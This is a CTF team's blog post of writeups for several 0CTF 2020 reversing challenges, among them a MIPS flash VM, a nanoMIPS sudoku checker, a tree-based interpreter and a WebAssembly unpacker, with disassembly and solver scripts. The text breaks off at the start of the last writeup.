hxp | 0CTF 2020 writeups

Fri, 03 July 2020 ~ hxp

0CTF 2020 writeups

This was a great CTF and we hacked some stuff. Here’s how.

flash1

iead | pwn, 27 solves, 297 points

For this task we were given a small MIPS flash image that was to be run inside QEMU. While I set up tooling (retdec), kirschju went ahead and took a look into the image itself. He found some timer-based obfuscation techniques and a couple of strings used by the challenge. More interesting was what I found directly before the strings, namely a pointer table.

ROM:80002690 opc_table:      .word op00               # 0
ROM:80002690                                          # DATA XREF: sub_80000698+1EC↑o
ROM:80002690                 .word op01               # 1
ROM:80002690                 .word op02               # 2
ROM:80002690                 .word op03               # 3
ROM:80002690                 .word op04               # 4
ROM:80002690                 .word op05               # 5
ROM:80002690                 .word op06               # 6
ROM:80002690                 .word op07               # 7
ROM:80002690                 .word op08               # 8
ROM:80002690                 .word op09_load_imm      # 9
ROM:80002690                 .word op0a               # 10
ROM:80002690                 .word op0b               # 11
ROM:80002690                 .word op0c               # 12
ROM:80002690                 .word op0d               # 13
ROM:800026C8 aWelcomeToFlagM:.ascii "Welcome to Flag Machine"<0>
ROM:800026C8                                          # DATA XREF: sub_80000698+6B0↑o

To better analyse these functions he used a small script to remove all the timer stuff which stripped branches from the functions.

#!/usr/bin/env python3
dat = bytearray(open("dump", "rb").read())
pat = b"\x10\x00\xFF\xFF\x00\x00\x00\x00"
dat = dat.replace(pat, bytes([0 for _ in range(len(pat)) ]))
open("dump_clean", "wb").write(dat)

He also found a suspicous region in memory:

ROM:80003D40 word_80003d40:  .half 9
ROM:80003D42                 .half 0x91D
ROM:80003D44                 .half 9
ROM:80003D46                 .half 0
ROM:80003D48                 .half 0xA
ROM:80003D4a                 .half 5
ROM:80003D4c                 .half 6
ROM:80003D4e                 .half 0x14
ROM:80003D50                 .half 9
ROM:80003D42                 .half 1
ROM:80003D40                 .half 0xA
ROM:80003D40                 .half 1
ROM:80003D40                 .half 0xB
ROM:80003D40                 .half 8
ROM:80003D40                 .half 9

Together with the pointer table we suspected it to be a virtual machine implementation. I fired up the virtual machine and attached using gdb-multiarch. Don’t forget to set the architecture to mips and endianes to big and put a breakpoint on all these functions. The I entered some bogus flag flag{asdhfaiusdhfuiasf} and waited for the breakpoint to trigger. The register values were not immediately helpful. Searching the around the VM code quickly revealed the internal state of the machine.

(gdb) x/20xw 0x80003d00
0x80003d00:	0x1000fa38	0x00000000	0x00000000	0x03e00008
0x80003d10:	0x00000000	0x1000fa3b	0x00000000	0x00000000
0x80003d20:	0x80002610	0x000b0000	0x00000000	0x80003d42
0x80003d30:	0x80018000	0x80020000	0x80018000	0x80008004
0x80003d40:	0x0009091d	0x00090000	0x000a0005	0x00060014

Continuing for one machine instruction reveals an updated state

(gdb) x/20xw 0x80003d00
0x80003d00:	0x1000fa38	0x00000000	0x00000000	0x03e00008
0x80003d10:	0x00000000	0x1000fa3b	0x00000000	0x00000000
0x80003d20:	0x80002610	0x000b0000	0x00000000	0x80003d46
0x80003d30:	0x80018000	0x80020000	0x80018002	0x80008004
0x80003d40:	0x0009091d	0x00090000	0x000a0005	0x00060014
(gdb) x/1xh 0x80018000
0x80018000:	0x091d

Taking a close look one can see a couple of important variables already. Single stepping the virtual machine and comparing the VM states I recovered all VM instructions.

Address	Description
`0x80003d24`	loop variable
`0x80003d28`	mul / mod register
`0x80003d2c`	instruction pointer
`0x80003d30`	stack base
`0x80003d38`	stack top

I wrote a quick disassembler for the VM and continued the analysis of the VM.

with open("vmcode", "rb") as f:
    data1 = f.read(0x185)
    data2 = f.read()

ins = [*map(lambda x: int.from_bytes(bytearray(x), "big"), chunk(data1, 2))]

instrs = [ ('0',1)
        , ('sub_inv', 1)
        , ('mul', 1)
        , ('mod', 1)
        , ('4', 1)
        , ('eq', 1)
        , ('jc', 2)
        , ('jnc', 2)
        , ('loadflag', 1)
        , ('imm', 2)
        , ('loadacc', 1)
        , ('storacc', 1)
        , ('c', 1)
        , ('d', 1)]

i = 0
disass = []
while i < len(ins):
    opc = ins[i]
    name, l = instrs[opc]
    if l == 1:
        print(f"{i:2x}: {name}")
        disass.append([i, f"{name}", opc])
    else:
        arg = ins[i + 1]
        print(f"{i:2x}: {name} {arg:#x}")
        disass.append([i, f"{name} {arg:#x}", opc, arg])
        i += 1
    i += 1

The machine started by writing the first 28 bytes of the flag to the stack and then continued with a reccuring pattern:

12: imm 0x11
14: mul
15: imm 0xb248
17: mod
18: imm 0x72a9
1a: eq
1b: jnc 0x144 # fail

This is the same as \[ (\mathtt{11}_{16} \times\mathrm{pop\_stack})\bmod \mathtt{B248}_{16} = \mathtt{72A9}_{16} \] It essentially checks for equality in the integer mod ring $\mathtt{B248}_{16}$. As $\mathtt{11}_{16}$ is prime there exists an unique multiplicative inverse. We can calculate the value pop_stack in order for the equality to hold by $(\mathtt{4969}_{16} \times \mathtt{72A9}_{16})\bmod \mathtt{B248}_{16}$. We similarly proceed for all other such blocks of VM code and are able to recover the flag. Since this is a stack machine one has to reverse the order of the individual results.

start = 0x19
snd = 0x24

tars = [ins[i] for i in range(0x19, len(ins), 0xb)][:-1]

flag = b"".join([((0x4969 * i) % 0xb248).to_bytes(2, 'big') for i in tars][::-1])
print(f"flag{{{flag.decode()}}}")

babymips

kirschju | rev, 27 solves, 297 points

This task taught us yet another architecture we never heared of before called nanoMIPS. The challenge consists of a small Linux ELF file and our job (judging from the output of almighty strings) is to find out how to make the program print Right. So far so easy, right?

Luckily, one of us noticed that there exists a vendor-supplied readily available build of the binutils toolchain for the nanoMIPS architecture. From this, we obtained a linear sweep disassembly using nanomips-linux-musl-objdump -d babymips. As the full disassembly listing was only ~400 lines we deemed manual reversing feasible and stopped any early-phase development of supportive tooling to better deal with the architecture.

A quick walkthrough of our approach:

nanomips-linux-musl-readelf -a babymips tells us that the entry point of the binary is 0x4003f6

The code at 0x4003f6 transfers control to 0x400410, which just calls __libc_start_main (the external function can be resolved by knowing that (nano)MIPS usually likes to address external functions via a fixed relative offset to the beginning of the got section by means of the $gp register, for which readelf nicely resolves a mapping of offsets to external function names:

> nanomips-linux-musl-readelf -a babymips | grep gp
004200ac        0(gp)  00000000  Lazy stub resolver
004200b0        4(gp)  80000000  Module pointer
004200b4        8(gp)  00400790
004200b8       12(gp)  004003c8
004200bc       16(gp)  00000000  Global      _ITM_deregisterTMCloneTable
004200c0       20(gp)  00000000  Global      _ITM_registerTMCloneTable
004200c4       24(gp)  00000000  Global      __deregister_frame_info
004200c8       28(gp)  00000000  Global      __register_frame_info
004200cc       32(gp)  00000000  Global      _Jv_RegisterClasses
004200d0       36(gp)  004003d0  Lazy-stub   read
004200d4       40(gp)  004003d6  Lazy-stub   strncmp
004200d8       44(gp)  004003dc  Lazy-stub   puts
004200dc       48(gp)  004003e2  Lazy-stub   memset
004200e0       52(gp)  004003e8  Lazy-stub   __libc_start_main

Since __libc_start_main takes a pointer to the main function as its first argument we knew that main was located at 0x4006e4.

From there, combining our external function resolver with basic knowledge about how compilers set up stack frames, we annotated the main function’s disassembly to recover the approximate source code:

4006e4:	save	128,fp,ra,gp                 // <main>
4006e8:	addiu	fp,sp,-3968
4006ec:	lapc	gp,4200ac <_fini+0x1f91c>
4006f0:	addiu	a3,sp,12
4006f2:	li	a2,90
4006f4:	movep	a0,a1,a3,zero
4006f6:	lw	a3,48(gp)
4006fa:	jalrc	a3                           memset(sp + 12, 0x00, 90);
4006fc:	addiu	a3,sp,12
4006fe:	li	a2,62
400700:	movep	a0,a1,zero,a3
400702:	lw	a3,36(gp)
400706:	jalrc	a3                           read(0, sp + 12, 62);
400708:	lbu	a3,73(sp)
40070c:	bneic	a3,125,40077c <_init+0x3b4>
400710:	addiu	a3,sp,12
400712:	li	a2,5
400714:	lapc	a1,400800 <_fini+0x70>
400718:	move	a0,a3
40071a:	lw	a3,40(gp)
40071e:	jalrc	a3                           strncmp(sp + 12, "flag{", 5);
400720:	move	a3,a0
400722:	bnezc	a3,40077c <_init+0x3b4>
400724:	sw	zero,108(sp)                     *(int *)(sp + 108) = 0;
400726:	li	a3,5
400728:	sw	a3,104(sp)                       *(int *)(sp + 104) = 5;
40072a:	bc	400758 <_init+0x390>

40072c:	lw	a3,108(sp)
40072e:	addiu	a3,a3,1
400730:	sw	a3,108(sp)                       *(int *)(sp + 108)++;

400732:	lapc	a2,420000 <_fini+0x1f870>
400736:	lw	a3,108(sp)
400738:	addu	a3,a2,a3
40073a:	lbu	a3,0(a3)
40073c:	bnezc	a3,40072c <_init+0x364>      if (arr_0x420000[*(int *)(sp + 108)] != 0) goto 40072c
40073e:	lw	a3,104(sp)
400740:	addiu	a2,sp,112
400742:	addu	a3,a2,a3
400744:	lbu	a2,-100(a3)                      a2 = *(char *)(sp + 12 + *(int *)(sp + 104));
400748:	lapc	a1,420000 <_fini+0x1f870>
40074c:	lw	a3,108(sp)
40074e:	addu	a3,a1,a3
400750:	sb	a2,0(a3)                         arr_0x420000[*(int *)(sp + 108)] = flag[*(int *)(sp + 104)];
400752:	lw	a3,104(sp)
400754:	addiu	a3,a3,1
400756:	sw	a3,104(sp)                      *(int *)(sp + 104)++;
400758:	lw	a3,104(sp)
40075a:	bltic	a3,61,400732 <_init+0x36a>  if (*(int *)(sp + 104*) < 61) goto 400732
40075e:	balc	4006b6 <check_all>
400760:	move	a3,a0
400762:	beqzc	a3,400770 <_init+0x3a8>
400764:	lapc	a0,400808 <_fini+0x78>
400768:	lw	a3,44(gp)
40076c:	jalrc	a3                          puts("Right");
40076e:	bc	400786 <_init+0x3be>
400770:	lapc	a0,400810 <_fini+0x80>
400774:	lw	a3,44(gp)
400778:	jalrc	a3                          puts("Wrong");
40077a:	bc	400786 <_init+0x3be>
40077c:	lapc	a0,400810 <_fini+0x80>
400780:	lw	a3,44(gp)
400784:	jalrc	a3                          puts("Wrong");
400786:	move	a3,zero
400788:	move	a0,a3
40078a:	restore.jrc	128,fp,ra,gp

The basic functionality of main can be summarized as follows: Read in 62 characters from stdin and check whether they are prefixed by flag{. Then, for every character behind flag{, insert it into the free (== zero) entries of an array stored at virtual address 0x420000 we refer to as blk. If not all of the 62 characters are processed, print Wrong and exit. Otherwise, call a function we refer to as check_all at 0x4006b6. If this function returns 0 print Wrong and exit. Print Right otherwise.
A nifty trick we used to resolve the address of the array at 0x420000 was to patch the ELF such that it would indicate a standard MIPS machine type (EM_MIPS, 0x08) and load it into IDA Pro. Even if IDA cannot make sense of the disassembly, it still loads the ELF segments and handles sections correctly thus allowing us to easily look up data at virtual addresses.
So, clearly, our job is to satisfy the checks contained in function 4006b6. After inspecting the code at this location we just found it to call three more subfunctions at locations 0x400580 (check1), 0x4005ee (check2), and 0x400652 (check3). Only if all three functions return non-zero, check_all would return 1 (i.e. success).

Using our annotation strategy we derived the following for check1:

<check1>:
400580:	save	48,fp,ra
400584:	addiu	fp,sp,-4048
400588:	sw	zero,12(sp)            unsigned char tmp[9] = { 0 };
40058a:	sw	zero,16(sp)
40058c:	sb	zero,20(sp)
400590:	sw	zero,28(sp)            unsigned int j = 0; // *(int *)(sp + 28)
400592:	bc	4005e0 <_init+0x218>
400594:	sw	zero,24(sp)            unsigned int i = 0; // *(int *)(sp + 24)
400596:	bc	4005c6 <_init+0x1fe>
  
400598:	lw	a2,28(sp)
40059a:	move	a3,a2
40059c:	sll	a3,a3,3
40059e:	addu	a3,a3,a2
4005a0:	lapc	a2,420054
4005a4:	addu	a2,a3,a2           // a2 = (arr_420054[9 * j]);
4005a6:	lw	a3,24(sp)
4005a8:	addu	a3,a2,a3
4005aa:	lbu	a3,0(a3)               // a3 = arr_420054[9 * j + i];
4005ac:	move	a2,a3
4005ae:	lapc	a3,420000
4005b2:	addu	a3,a2,a3
4005b4:	lbu	a2,0(a3)               a2 = arr_420000[arr_420054[9 * j + i]];
4005b6:	lw	a3,24(sp)
4005b8:	addiu	a1,sp,32
4005ba:	addu	a3,a1,a3
4005bc:	sb	a2,-20(a3)             tmp[i] = a2;
4005c0:	lw	a3,24(sp)
4005c2:	addiu	a3,a3,1
4005c4:	sw	a3,24(sp)              i++;
4005c6:	lw	a3,24(sp)
4005c8:	bltic	a3,9,400598        if (i < 9) goto 400598;
4005cc:	addiu	a3,sp,12
4005ce:	move	a0,a3
4005d0:	balc	4004c6 <check0_chk_perm>
4005d2:	move	a3,a0
4005d4:	bnezc	a3,4005da          if (!check0_chk_perm(tmp)) return 0;
4005d6:	move	a3,zero
4005d8:	bc	4005e8
4005da:	lw	a3,28(sp)
4005dc:	addiu	a3,a3,1
4005de:	sw	a3,28(sp)              j++;
4005e0:	lw	a3,28(sp)
4005e2:	bltic	a3,9,400594        if (j < 9) goto 400594;
4005e6:	li	a3,1                       return 1;
4005e8:	move	a0,a3
4005ea:	restore.jrc	48,fp,ra

This function interprets the constants of array arr_420054 as a 9x9 matrix and uses its entries as indices into our (expanded) blk (address 0x420000) containing the flag+constants mix. Then, for every group of 9 characters extracted from our blk like this, call another function check0_chk_perm. So let’s annotate this one too:

<check0_chk_perm>:
4004c6:	save	80,fp,ra
4004c8:	addiu	fp,sp,-4016
4004cc:	sw	a0,12(sp)
4004ce:	sw	zero,20(sp)         int c[9] = { 0 };
4004d0:	sw	zero,24(sp)
4004d2:	sw	zero,28(sp)
4004d4:	sw	zero,32(sp)
4004d6:	sw	zero,36(sp)
4004d8:	sw	zero,40(sp)
4004da:	sw	zero,44(sp)
4004dc:	sw	zero,48(sp)
4004de:	sw	zero,52(sp)
4004e0:	sw	zero,60(sp)         int i = 0; // *(int *)(sp + 60)
4004e2:	bc	400550 <_init+0x188>
  
4004e4:	lw	a3,60(sp)
4004e6:	lw	a2,12(sp)
4004e8:	addu	a3,a2,a3
4004ea:	lbu	a3,0(a3)            a3 = perm[i]
4004ec:	addiu	a3,a3,-97
4004f0:	bgeiuc	a3,26,400546    if (perm[i] - 0x61 >= 26) return 0;
4004f4:	lapc	a2,400798
4004f8:	lwxs	a2,a3(a2)       a2 = arr_400798[perm[i] - 0x61];
4004fa:	brsc	a2              switch (perm[i]) {
4004fe:	lw	a3,20(sp)               /* 0x00 */  case 'z':
400500:	addiu	a3,a3,1             /* 0x02 */      c[0]++;
400502:	sw	a3,20(sp)               /* 0x04 */  break;
400504:	bc	40054a <_init+0x182>    /* 0x06 */
400506:	lw	a3,24(sp)               /* 0x08 */  case 'x':
400508:	addiu	a3,a3,1             /* 0x0a */      c[1]++;
40050a:	sw	a3,24(sp)               /* 0x0c */  break;
40050c:	bc	40054a <_init+0x182>    /* 0x0e */
40050e:	lw	a3,28(sp)               /* 0x10 */  case 'c':
400510:	addiu	a3,a3,1             /* 0x12 */      c[2]++;
400512:	sw	a3,28(sp)               /* 0x14 */  break;
400514:	bc	40054a <_init+0x182>    /* 0x16 */
400516:	lw	a3,32(sp)>              /* 0x18 */  case 'a':
400518:	addiu	a3,a3,1>            /* 0x1a */      c[3]++;
40051a:	sw	a3,32(sp)>              /* 0x1c */  break;
40051c:	bc	40054a <_init+0x182>>   /* 0x1e */
40051e:	lw	a3,36(sp)>              /* 0x20 */  case 's':
400520:	addiu	a3,a3,1>            /* 0x22 */      c[4]++;
400522:	sw	a3,36(sp)>              /* 0x24 */  break;
400524:	bc	40054a <_init+0x182>    /* 0x26 */
400526:	lw	a3,40(sp)               /* 0x28 */  case 'd':
400528:	addiu	a3,a3,1             /* 0x2a */      c[5]++;
40052a:	sw	a3,40(sp)               /* 0x2c */  break;
40052c:	bc	40054a <_init+0x182>    /* 0x2e */
40052e:	lw	a3,44(sp)               /* 0x30 */ case 'q':
400530:	addiu	a3,a3,1             /* 0x32 */     c[6]++;
400532:	sw	a3,44(sp)               /* 0x34 */ break;
400534:	bc	40054a <_init+0x182>    /* 0x36 */
400536:	lw	a3,48(sp)               /* 0x38 */ case 'w':
400538:	addiu	a3,a3,1             /* 0x3a */     c[7]++;
40053a:	sw	a3,48(sp)               /* 0x3c */ break;
40053c:	bc	40054a <_init+0x182>    /* 0x3e */
40053e:	lw	a3,52(sp)               /* 0x40 */ case 'e':
400540:	addiu	a3,a3,1             /* 0x42 */     c[8]++;
400542:	sw	a3,52(sp)               /* 0x44 */ break;
400544:	bc	40054a <_init+0x182>    /* 0x46 */
  
400546:	move	a3,zero                        default: return 0;
400548:	bc	40057c <_init+0x1b4>    }
  
40054a:	lw	a3,60(sp)
40054c:	addiu	a3,a3,1
40054e:	sw	a3,60(sp)           i++;
400550:	lw	a3,60(sp)
400552:	bltic	a3,9,4004e4     if (i < 9) goto 4004e4;
400556:	sw	zero,56(sp)         j = 0;
400558:	bc	400574
  
40055a:	lw	a3,56(sp)
40055c:	sll	a3,a3,2
40055e:	addiu	a2,sp,64
400560:	addu	a3,a2,a3
400562:	lw	a3,-44(a3)          a3 = c[j];
400566:	beqic	a3,1,40056e     if (c[j] != 1)
40056a:	move	a3,zero         return 0;
40056c:	bc	40057c
40056e:	lw	a3,56(sp)
400570:	addiu	a3,a3,1
400572:	sw	a3,56(sp)           j++;
400574:	lw	a3,56(sp)
400576:	bltic	a3,9,40055a     if (j < 9) goto 40055a;
40057a:	li	a3,1
40057c:	move	a0,a3
40057e:	restore.jrc	80,fp,ra

This function is a bit cumbersome to reverse, because it implements a large switch statement via a lookup table containing relative indices. As the array is 0x61-based, we recovered a mapping between the matched letters and the executed code via the indices, which can be found in the annotation. Basically, the code just counts the occurrences of the letters zxcasdqwe. The check that is performed is then whether all counters have the value 1.

By now, we realized that this check has a striking similarity to the popular 数独 puzzles. Quickly glancing over check2 and check3 we realized that they implemented similar checks counting characters contained in arrays of size 9, once on a per-column and once on a per-row basis. This confirmed our initial feeling and we quickly hacked up the following Sudoku solver based on the z3 theorem prover, which swiftly found the flag.

#!/usr/bin/env python3
  
import z3
import math
  
blk = [
0x00, 0x00, 0x77, 0x00, 0x00, 0x00, 0x73, 0x00, 0x00, 0x00,
0x00, 0x00, 0x64, 0x00, 0x00, 0x77, 0x00, 0x00, 0x64, 0x00,
0x00, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x65, 0x00,
0x77, 0x00, 0x71, 0x00, 0x61, 0x00, 0x65, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x7A, 0x64,
0x00, 0x00, 0x73, 0x77, 0x71, 0x00, 0x00, 0x00, 0x00, 0x77,
0x00, 0x00, 0x73, 0x78, 0x00, 0x64, 0x00, 0x00, 0x00, 0x00,
0x00, 0x7A, 0x77, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x64,
0x78,
]
  
perms = [
  0x00, 0x01, 0x02, 0x03, 0x0A, 0x0C, 0x0D, 0x0E, 0x13,
  0x04, 0x05, 0x06, 0x0F, 0x18, 0x19, 0x21, 0x2A, 0x33,
  0x07, 0x08, 0x10, 0x11, 0x1A, 0x22, 0x23, 0x2B, 0x34,
  0x09, 0x12, 0x1B, 0x24, 0x2D, 0x36, 0x37, 0x3F, 0x48,
  0x0B, 0x14, 0x15, 0x1C, 0x1D, 0x1E, 0x25, 0x2E, 0x27,
  0x16, 0x17, 0x1F, 0x20, 0x28, 0x31, 0x3A, 0x42, 0x43,
  0x26, 0x2F, 0x30, 0x38, 0x39, 0x40, 0x41, 0x49, 0x4A,
  0x29, 0x32, 0x3B, 0x3C, 0x3D, 0x44, 0x4B, 0x4C, 0x4D,
  0x2C, 0x35, 0x3E, 0x45, 0x46, 0x47, 0x4E, 0x4F, 0x50,
]
  
s = z3.Solver()
fs = [ z3.BitVec("f{}".format(i), 9) for i in range(len(blk)) ]
  
for j in range(9):
  for i in range(9):
      if blk[j * 9 + i] == 0:
          s.add(z3.Or(
                  fs[j * 9 + i] == (1 << 0),
                  fs[j * 9 + i] == (1 << 1),
                  fs[j * 9 + i] == (1 << 2),
                  fs[j * 9 + i] == (1 << 3),
                  fs[j * 9 + i] == (1 << 4),
                  fs[j * 9 + i] == (1 << 5),
                  fs[j * 9 + i] == (1 << 6),
                  fs[j * 9 + i] == (1 << 7),
                  fs[j * 9 + i] == (1 << 8),
                ))
      else:
          s.add(fs[j * 9 + i] == 1 << b"zxcasdqwe".index(blk[j * 9 + i]))
  
  
for j in range(9):
  s.add(z3.Sum([fs[9 * j + i] for i in range(9)]) == 0x1ff)
  s.add(z3.Sum([fs[9 * i + j] for i in range(9)]) == 0x1ff)
  s.add(z3.Sum([fs[perms[9 * j + i]] for i in range(9)]) == 0x1ff)
  
print(s.check())
  
for j in range(9):
  print(["zxcasdqwe"[int(math.log2(s.model()[fs[j * 9 + i]].as_long()))] for i in range(9) ])
  
flag = []
for j in range(9):
  for i in range(9):
      if blk[j * 9 + i] == 0x00:
          flag.append("zxcasdqwe"[int(math.log2(s.model()[fs[j * 9 + i]].as_long()))])
  
print("flag{{{}}}".format("".join(flag)))

Happy Tree

bobo1239 | rev, 17 solves, 407 points

We’re given a 32-bit Linux executable which prompts us for the flag. Opening it up in IDA reveals only relatively few functions which mostly don’t seem complicated at all. The big exception to that observation is one of the functions in .init_array which gets called during initialization. It consists of a huge basic block without any branches/loops. It mallocs a bunch of small allocations and stores the returned addresses at fixed locations in static data. Then it fills the allocated chunks with references to static data and sets up a bunch of other stuff in .bss. Looking at main() we see that it just loads an address to static data and calls a function pointer there which basically confirms our suspicion: The real program logic is encoded in a tree which is setup up in the init function and the rest of the program just walks along the tree and executes code referenced in the tree. After reversing the rest of the functions we see that almost all just take a tree node as an argument and just do simple stuff like executing a function pointer contained in the node.

Our first approach was to reconstruct the state of the program after initialization and just rebuild the functions to get a better understanding of what actually happens. But then we noticed that actually all computation must happen in the one function which contains instructions to compute things. It has a switch to dynamically choose what to compute and takes two arguments from it’s child nodes. (this is similar to a virtual machine) With that in mind there’s a chance to take a big shortcut if we can just deduce the program logic by looking at what data flows in and out of that function. Luckily for us that did indeed work and we could just ignore the whole tree aspect of the challenge in the end.

After manually tracing that function with gdb we observe that:

Our flag input is taken in 4 byte (characters) chunks as a u32
That chunk undergoes a transformation containing fixed shifts and XORs (see below for specifics)
The transformation is repeated 0x186a0 times
Then it computes another value unrelated to our flag input
That value is then compared with our transformed flag input
Then the whole process is repeated with the next flag chunk

So we know (dynamically) what the transformed flag output must equal to and the function on the flag input is very simple. Fortunately everything is also processed in 4 byte chunks so it is actually very feasible to just brute force every individual flag chunk which is what we’ve done in the end:

use rayon::prelude::*;

fn main() {
    let mut flag = Vec::new();
    let targets = [
        0xa25dc66a, 0xaa0036, 0xc64e001a, 0x369d0854, 0xf15bcf8f, 0x6bbe1965, 0x1966cd91,
        0xd4c5fbfd, 0xb04a9b1b,
    ];
    let mut xor = false;
    for target in &targets {
        flag.extend_from_slice(&brute_part(*target, xor).unwrap());
        println!("{}", std::str::from_utf8(&flag).unwrap());
        xor = !xor;
    }
}

fn brute_part(target: u32, xor: bool) -> Option<[u8; 4]> {
    let mut printable_chars = Vec::new();
    for i in 0..=255u8 {
        let c = i as char;
        if c.is_ascii_graphic() {
            if xor {
                printable_chars.push(i ^ 0xaa);
            } else {
                printable_chars.push(i);
            }
        }
    }
    printable_chars
        .par_iter()
        .find_map_any(|b0| {
            for b1 in &printable_chars {
                for b2 in &printable_chars {
                    for b3 in &printable_chars {
                        let bytes = [*b0, *b1, *b2, *b3];
                        let mut a = u32::from_le_bytes(bytes);
                        let mut b = a;
                        for _ in 0..0x186a0 {
                            b <<= 0xd;
                            b ^= a;
                            b ^= b >> 0x11;
                            b ^= b << 5;
                            a = b;
                        }
                        if b == target {
                            return Some(bytes);
                        }
                    }
                }
            }
            None
        })
        .map(|mut found| {
            if xor {
                for x in &mut found {
                    *x ^= 0xaa;
                }
            }
            found
        })
}

The program makes use of all threads and after roughly 2h we were greeted with the flag:

flag{HEY!Lumpy!!W@tcH_0ut_My_TrEe!!}

W

hlt | rev, 11 solves, 523 points

In this task, we deal with a fairly large webassembly binary, so I will only show the relevant parts of the decompilation.

Most of this was made a lot easier by decompiling the binaries with benediktwerner’s excellent rewasm (featured, of course, in our very own xmas_future challenge from last year), which unlike wasmdec actually produced readable output!

Here is the main function (function 13) of the ww binary, cleaned up a little:

fn main(i32 argc, i32 argv) -> i32 {
    /* ... */
    puts(22037); // Secret:
    var_17 = fgets(var_2 + 32, 64, load<i32>(23360) /* stdin */);
    if var_17 != 0 & 1 {
        input_len = strlen(var_2 + 32 /* input */);
        buffer = calloc(0x5200 + 1, 1);
        store<i32>(var_2 + 28 /* buffer */, buffer)
        if buffer != 0 & 1 {
            memcpy(buffer, 1024, 0x5200);
            unpack(buffer, 0x5200, var_2 + 32 /* input */);
            var_33 = memmem(buffer, 0x5200, 22080, strlen(22080));
            if var_33 {
                puts(22058); // Loading...
                var_36 = load_wasm(buffer, 0x5200);
                store<i32>(var_2 + 24, var_36)
                var_37 = load<i32>(var_2 + 24);
                var_38 = init_interpreter(var_37);
                /* ... */
                load_data_section(var_39);
                load_globals(var_40);
                puts(22069);
                /* ... */
                free_interpreter(var_43);
                free_wasm_obj(var_44);
            }
            else {
                puts(22050);
            }
        }
    }
}

Of course, the function names give away half the game: we are dealing with a webassembly interpreter compiled to webassembly that loads an encrypted buffer. Clearly, we need to reverse the unpack function and find a key that ensures that the string Welcome to 0CTF/TCTF 2020! Have a g00d time (at address 22080) shows up in the decrypted buffer.

Analysis reveals that the buffer is unpacked in chunks of 512 bytes. Translated to Python, the unpacking routine looks like this:

def unpack_chunk(buf, start, key):
    i = 255
    for byte_in_chunk in range(512):
        key_index = byte_in_chunk & 31;
        key_byte = key[key_index]
        source_byte = buf[start + byte_in_chunk]
        diff = source_byte ^ i ^ key_byte
        i = source_byte
        buf[start + byte_in_chunk] = (diff - key_index) % 0x100

def unpack(buf, key):
    for chunk in range(0, len(buf), 512):
        unpack_chunk(buf, chunk, key)

Since we know the secret key is at most 32 bytes long (due to the & 31 in the unpacker), we can test for the target string at each location and verify that the rest shows up if we continue unpacking:

def i_at(position):
    if position % 512 == 0:
        return 255
    return buf[position - 1]

with open('buffer', 'rb') as buff:
    buf = buff.read()
assert len(buf) == 0x5200

target_message = b'Welcome to 0CTF/TCTF 2020! Have a g00d time'
def get_key(position):
    key_bytes = bytearray(32)
    for offset in range(len(target_message)):
        shifted = position + offset
        key_index = shifted & 31
        key_byte = ((target_message[offset] + key_index) % 0x100) ^ buf[shifted] ^ i_at(shifted)
        if offset < 32:
            key_bytes[key_index] = key_byte
        elif key_bytes[key_index] != key_byte:
            return None
    return bytes(key_bytes)

for candidate_start in range(len(buf) - len(target_message)):
    key = get_key(candidate_start)
    if key:
        print(key)
        copy = bytearray(buf)
        unpack(copy, key)
        with open(f'buffer.{key.decode()}', 'wb') as buff:
            buff.write(copy)

This gives us exactly one candidate key: eNj0y_weba5SemB1Y.lstrip("web")!

Of course, we already know the decrypted buffer will be another webassembly binary — but initially, all tools fail to open it because of the large number of zero bytes at the end of the buffer. Once we strip those off, we can again decompile the binary, which turns out to contain quite a large mess of code.

When loaded with the correct secret, the program prints a banner with a number of possible operations (note that this binary is also used for a pwn challenge, so it is important not to get distracted here); the strings reveal a number of IO functions and show that the main function is function 22.

Secret: 🙄
Loading...
Go Go Go!!
aoshine~ What's up?
1. add pair
2. dump pair
3. check pair
4. exit

We also learn from the main function and the strings how the flag is constructed:

    var_121 = func_3(var_118, var_120);
    store<i32>(var_92 + 12, var_121)
    var_122 = load<i32>(var_92 + 12);
    if var_122 {
        var_123 = load<i32>(var_92 + 12);
        itoa(var_123, var_92 + 32); // stores itoa(var_123) in var_92 + 32
        print(1212); // "flag is: flag{secret+"
        print(var_92 + 32); // prints var_123
        print(1234); // "}"
    }

Clearly, we need to find what var_123 will be, i.e. what the result of func_3 is going to be.

At this point, there were about 25 minutes left in the CTF, so a bit of educated guessing was asked for. Since the code appears to deal with pairs of numbers (by the banner text), I simply assumed that var_118 and var_120 will be one such pair of numbers.

func_3 performs a number of operations on its two arguments, but we can discard most of the initial processing: There is only one code path that returns a non-zero value (which needs to happen so that we actually print the success message)! A cursory inspection of function 18 shows that it is just atoi, and function 4 appears to check the numbers for validity of some kind (it just returns 0 or 1). At this point, I deferred reversing function 4 to the end, which ended up being the right choice (I actually never ended up having to reverse this function, and never managed to get the program to actually spit out the success message, but flag is flag).

func_3 continues on to check the two arguments against two linear equations:

        var_16 = load<i32>(var_2 + 16); // atoi(arg_0)
        var_17 = load<i32>(var_2 + 12); // atoi(arg_1)
        var_18 = var_16 * 20 + var_17 * 87;
        store<i32>(var_2 + 8, var_18) // atoi(arg_0) * 20 + atoi(arg_1) * 87
        var_19 = load<i32>(var_2 + 16);
        var_20 = load<i32>(var_2 + 12);
        store<i32>(var_2 + 4, var_19 + var_20) // atoi(arg_0) + atoi(arg_1)
        var_21 = load<i32>(var_2 + 8);
        var_22 = (var_21 == 20200627 & 1) == 0; // 20x + 87y = 20200627
        if !var_22 {
            var_23 = load<i32>(var_2 + 4);
        }
        if var_22 || (var_23 == 249310 & 1) == 0 { // x + y = 249310
            store<i32>(var_2 + 28, 0) // store 0
        }
        else {
            var_24 = load<i32>(var_2 + 16);
            var_25 = load<i32>(var_2 + 12);
            var_26 = var_24 * 20 + var_25 * 20; // store 20x + 20y
            store<i32>(var_2 + 28, var_26 + 628) // 20x + 20y + 628
        }

This already reveals the result, and we don’t even need to understand what function 4 does!

Given $x + y = 249310$ and $20x + 87y = 20200627$, we can easily compute $x = 227081$ and $y = 22229$. Then, $20x + 20y + 628 = 4986828$ is the result of func_3

This gives us the flag:

flag{eNj0y_weba5SemB1Y.lstrip("web")!+4986828}

J

kirschju/hlt/yyyyyyy | rev, 9 solves, 578 points

tl;dr: The challenge consists of a Windows executable for x86-64 that combines (slightly) customized crypto algorithms with obfuscation to delay analysis.

High-level Investigation

After opening the binary in IDA and studying the main function a bit we found the high-level functionality of the program to be similar to this:

